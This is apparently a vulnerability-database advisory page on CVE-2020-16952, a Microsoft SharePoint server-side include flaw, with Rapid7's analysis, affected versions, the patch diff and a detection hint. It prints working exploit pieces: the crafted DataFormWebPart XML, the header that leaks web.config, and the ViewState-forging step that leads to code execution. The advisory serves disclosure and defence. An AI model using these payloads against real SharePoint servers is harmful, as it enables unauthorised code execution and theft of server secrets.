Very High
CVE-2020-16952 — Microsoft SharePoint Remote Code Execution Vulnerabilities
CVE-2020-16952 — Microsoft SharePoint Remote Code Execution Vulnerabilities
Description
A remote code execution vulnerability exists in Microsoft SharePoint when the software fails to check the source markup of an application package. An attacker who successfully exploited the vulnerability could run arbitrary code in the context of the SharePoint application pool and the SharePoint server farm account.
Exploitation of this vulnerability requires that a user uploads a specially crafted SharePoint application package to an affected version of SharePoint.
The security update addresses the vulnerability by correcting how SharePoint checks the source markup of application packages.
Add Assessment
Technical Analysis
Please see the Rapid7 analysis. A Metasploit module will be released.
Technical Analysis
There were a lot of vulns out this week, a number of which got quite a bit more news cycle attention than this one (lookin’ at you, Bad Neighbor). Unlike a few of those higher-hype bugs, however, this one is an active threat. Like other significant vulnerabilities from this year, the fact that this is authenticated isn’t a barrier for attackers and alas, shouldn’t be a consolation for those tasked with securing SharePoint environments.
@tsellers-r7 has a really great Twitter thread here on the number of publicly exposed, vulnerable SharePoint installations and version/support complexities that defenders may not realize they need to take into account. Metasploit Framework will also have module out in next week’s release.
CVSS V3 Severity and Metrics
General Information
Vendors
- microsoft
Products
- sharepoint enterprise server 2016,
- sharepoint foundation 2013,
- sharepoint server 2019
Metasploit Modules
References
Technical Analysis
Update October 14, 2020: A Metasploit module exploiting CVE-2020-16952 has been published and contains remote check logic as well as supplementary exploitation details.
Description
On Tuesday, October 13, as part of the October 2020 Patch Tuesday release, Microsoft published a security advisory for CVE-2020-16952, a server-side include (SSI) vulnerability in Microsoft SharePoint. The bug is exploitable by an authenticated user with page creation privileges, which is a standard permission in SharePoint, and allows the leaking of an arbitrary file, notably the application’s web.config file, which can be used to trigger remote code execution (RCE) via .NET deserialization. CVE-2020-16952 carries a CVSSv3 base score of 8.6.
Steven Seeley, the researcher who discovered and disclosed the vulnerability to Microsoft, published an advisory of his own with the vulnerability’s technical details. Seeley’s advisory includes a proof-of-concept (PoC) Python exploit that leverages the vulnerability to leak the web.config file, extract the ViewState validation key, and forge a malicious ViewState that will be deserialized by the application. Using a .NET gadget chain from ysoserial.net, the exploit is able to execute an arbitrary command as the SharePoint user.
An easily available proof-of-concept makes CVE-2020-16952 an impending threat. There are no reports of exploitation in the wild as of October 13, 2020.
Affected products
- Microsoft SharePoint Foundation 2013 Service Pack 1
- Microsoft SharePoint Enterprise Server 2016
- Microsoft SharePoint Server 2019
Rapid7 analysis
CVE-2020-16952 exists within the CreateChildControls() method in the Microsoft.SharePoint.WebPartPages.DataFormWebPart class and is well-documented in Seeley’s exploit.
Exploitation of the vulnerability is straightforward and begins with NTLM authentication over HTTP. After authentication has succeeded, an HTTP PUT request containing the following XML is sent to /poc.aspx (or any page the attacker is able to create). This is used to establish the source of the server-side include (SSI), which is the HTTP header 360Vulcan (or a header of the attacker’s choosing).
<WebPartPages:DataFormWebPart runat="server"> <ParameterBindings> <ParameterBinding Name="ssi" Location="ServerVariable(HTTP_360Vulcan)" DefaultValue="" /> </ParameterBindings> <xsl> <xsl:stylesheet xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" version="1.0"> <xsl:param name="ssi" /> <xsl:template match="/"> <xsl:value-of select="$ssi" disable-output-escaping="yes" /> </xsl:template> </xsl:stylesheet> </xsl> </WebPartPages:DataFormWebPart>
Next, a GET request containing the 360Vulcan header is sent to /poc.aspx in order to trigger the SSI and leak SharePoint’s web.config file. The header can be seen below.
360Vulcan: <form runat="server" /><!--#include virtual="/web.config"-->
Finally, using the ViewState validation key extracted from web.config, the attacker is able to forge their own ViewState containing ysoserial.net gadgets and execute a command of their choosing.
The patch for CVE-2020-16952 enables blockServerSideIncludes in the VerifyControlOnSafeList() call within CreateChildControls():
- EditingPageParser.VerifyControlOnSafeList(this._dataSourcesString.Trim(), null, base.Web, false); + EditingPageParser.VerifyControlOnSafeList(this._dataSourcesString.Trim(), null, base.Web, true);
internal static void VerifyControlOnSafeList(string dscXml, RegisterDirectiveManager registerDirectiveManager, SPWeb web, bool blockServerSideIncludes = false)
SharePoint is a high-value attack target and has seen a number of high-severity vulnerabilities patched in recent months. It is likely that active exploitation will occur within a relatively short time frame; it was trivial for Rapid7 researchers to validate the vulnerability’s exploitability and weaponize Seeley’s PoC.
Guidance
Since an exploit has been released, Rapid7 researchers recommend applying Microsoft’s patch immediately. CVE-2020-16952 poses higher risk for multi-tenant environments—i.e., multiple organizations using the same SharePoint and/or Active Directory environment.
For patching information, please see KB4486694 for SharePoint 2013, KB4486677 for SharePoint 2016, and KB4486676 for SharePoint 2019.
Defenders can detect this exploit variant by identifying HTTP headers containing the string runat="server", as well as auditing SharePoint page creations.
